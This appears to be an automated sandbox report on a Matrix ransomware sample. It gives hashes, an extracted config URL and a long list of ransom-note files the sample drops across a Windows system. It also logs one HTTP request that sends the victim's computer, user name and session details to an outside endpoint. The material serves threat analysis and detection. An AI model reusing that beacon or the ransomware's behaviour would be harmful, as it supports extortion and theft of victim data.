Analysis
-
max time kernel
153s -
max time network
121s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe
Resource
win10
General
-
Target
f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe
-
Size
2.4MB
-
MD5
c13d671ed16399a2b430c79b3200b425
-
SHA1
9acfb64b5617566d97a9ded3b295915035b3e3e7
-
SHA256
f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14
-
SHA512
1e4a9d96b8c0c3f967ccf52f7a3360e5a28929420475e565318c82e38fb75ed3039605f95d6e466e0d4f06100c4145800ca6bea2548d3d1ad89cc0d1093beef6
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 462 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Adobe\Color\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DUF815Z1\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Favorites\Microsoft Websites\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\ext\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Videos\Sample Videos\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Music\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JSOYQ5ME\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Recorded TV\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Favorites\MSN Websites\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00008D31\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\permanent\chrome\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe HTTP URL 7 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=UCQFZDUI|Admin&sid=rhCRvpynnHrrWMnj&phase=2BD8F144E79A3AE0|3488|1GB Process not Found File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\permanent\chrome\idb\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Downloads\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package 